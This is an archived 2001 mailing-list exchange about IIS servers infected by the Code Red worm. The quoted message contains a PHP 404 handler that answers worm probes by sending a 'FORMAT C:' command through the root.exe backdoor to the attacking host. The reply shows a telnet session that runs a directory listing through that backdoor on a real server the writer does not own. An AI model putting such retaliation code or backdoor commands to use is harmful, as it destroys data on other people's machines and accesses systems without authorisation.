Windows won't let you format c: as the volume is locked. Even if it would, the format
program would prompt "are you sure???, are you really sure???"
Although this *IS* very interesting, I found a server that would let me do this:
~$ telnet xxxxx 80
Trying xxxxx...
Connected to xxxxx
Escape character is '^]'.
GET /scripts/root.exe?/c+DIR+C: HTTP/1.0
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Tue, 07 Aug 2001 10:02:28 GMT
Content-Type: application/octet-stream
Volume in drive C is SYSTEM
Volume Serial Number is 8C36-99B1
Directory of C:\Inetpub\scripts
05/06/2001 12:53p <DIR> .
05/06/2001 12:53p <DIR> ..
07/12/2001 08:33p 291 default.asp
07/12/2001 08:33p 291 default.htm
07/12/2001 08:33p 291 index.asp
07/12/2001 08:33p 291 index.htm
12/07/1999 06:00a 236,304 root.exe
5 File(s) 237,468 bytes
2 Dir(s) 3,055,824,896 bytes free
Connection closed by foreign host.
~$
This is not good for IIS owners.
On Tue, Aug 07, 2001 at 12:29:20PM -0700, Rob Hudson wrote:
> If anyone is malicious enough, this should format the hard drive of an
> infected host who is trying to infect your computer, but only if
> you're not running IIS. :)
>
> <?php
> if (eregi("default.ida", $REQUEST_URI)) {
> $fp = fsockopen ($REMOTE_ADDR, 80, &$errno, &$errstr, 30);
> if ($fp) {
> fputs ($fp, "GET /scripts/root.exe?/c+FORMAT+C: HTTP/1.0\n\n");
> }
> }
> ?>
>
>
> Just use that as your 404 handler in Apache. Of course, it's not
> tested b/c I don't want to go there. There would probably be lots of
> repercussions, but it is real scary that this code would probably
> actually work.
>
> -Rob
>
